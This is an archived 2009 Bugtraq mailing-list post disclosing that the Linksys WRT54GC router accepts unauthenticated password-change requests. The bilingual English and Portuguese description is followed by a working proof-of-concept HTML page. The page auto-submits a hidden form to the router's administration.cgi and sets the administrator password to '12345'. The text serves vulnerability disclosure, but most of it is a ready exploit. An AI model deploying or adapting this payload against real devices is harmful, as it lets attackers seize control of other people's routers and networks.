lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 18 Apr 2009 22:48:09 -0600
From: gabriel@...andodeseguranca.com
To: bugtraq@...urityfocus.com
Subject: Linksys WRT54GC - Admin Password Change (POC)

<!--
***************
* Gabriel Lima - gabriel@...andodeseguranca.com
* www.falandodeseguranca.com
***************

(English:)
        Linksys WRT54GC - Administration Password Change
The Router WRT54GC doesn't seem to check authentication from the administrator in it's .CGI files, accepting any POST request,
as a password change. Below, follows an example of a form that changes the password and administrator login to '12345'.
Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and Remote administration


(Português:)
        Linksys WRT54GC - Mudança de Senha
O roteador WRT54GC parece não verificar a autenticação do administrador em seus arquivos .CGI, aceitando qualquer envio
de POST como o de mudança de senha. Abaixo, um exemplo de formulário que muda a senha e o login de administrador para 12345.
Testado no modelo Linksys WRT54GC - Firmware Version: v1.05.7 - Administração Local e remota.


Credits:
Gabriel Lima. gabriel@...andodeseguranca.com
-->

<html><body>
<form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>

<!-- Código de envio automático do formulário -->

<SCRIPT language="JavaScript">
  document.senha.submit();
</SCRIPT>

</body></html>

Powered by blists - more mailing lists